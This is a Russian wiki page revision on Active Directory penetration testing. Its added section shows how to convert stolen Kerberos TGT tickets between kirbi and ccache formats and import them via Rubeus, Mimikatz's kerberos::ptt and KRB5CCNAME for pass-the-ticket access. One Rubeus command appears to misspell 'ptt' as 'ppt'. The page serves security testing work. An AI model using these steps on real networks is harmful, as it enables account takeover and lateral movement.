Active directory — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м |
Drakylar (обсуждение | вклад) м |
||
| Строка 42: | Строка 42: | ||
Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force | Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force | ||
| + | |||
| + | == TGT-билет == | ||
| + | |||
| + | Как Cookie у браузера, он требуется для получения TGS который в свою очередь используется для подключения к сервисам. Если вы нашли файл с TGT-ключем, то у него есть два формата: kirbi & ccache, поэтому надо сконвертировать. | ||
| + | |||
| + | === Конвертация === | ||
| + | |||
| + | https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | ./ticket_converter.py admin.ccache admin.kirbi | ||
| + | ./ticket_converter.py admin.kirbi admin.ccache | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | === Импорт тикета === | ||
| + | |||
| + | !Не забудьте установить время то же, пункт выше! | ||
| + | |||
| + | ==== .ccache ==== | ||
| + | |||
| + | Rubeus | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | .\Rubeus.exe ppt /ticket:new_ticket.ccache | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Mimikatz | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | mimikatz # kerberos::ptt new_ticket.ccache | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Bash | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | export KRB5CCNAME=./test.ccache | ||
| + | </syntaxhighlight> | ||
Версия 19:56, 18 января 2022
Страница посвящена тестированию на проникновение сетей Active Directory на Windows OS.
Содержание
Общая информация о сети
Домен
Доменный контроллер
Доменные компьютеры
Дополнительная информация о сети
Список пользователей
Без перебора
С перебором
Время сети
NTP
HTTP
Сетевая информация
IP
Сервисы
Получение начального доступа
Анонимный доступ
Учетные данные
Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force
TGT-билет
Как Cookie у браузера, он требуется для получения TGS который в свою очередь используется для подключения к сервисам. Если вы нашли файл с TGT-ключем, то у него есть два формата: kirbi & ccache, поэтому надо сконвертировать.
Конвертация
https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py
./ticket_converter.py admin.ccache admin.kirbi
./ticket_converter.py admin.kirbi admin.ccacheИмпорт тикета
!Не забудьте установить время то же, пункт выше!
.ccache
Rubeus
.\Rubeus.exe ppt /ticket:new_ticket.ccacheMimikatz
mimikatz # kerberos::ptt new_ticket.ccacheBash
export KRB5CCNAME=./test.ccache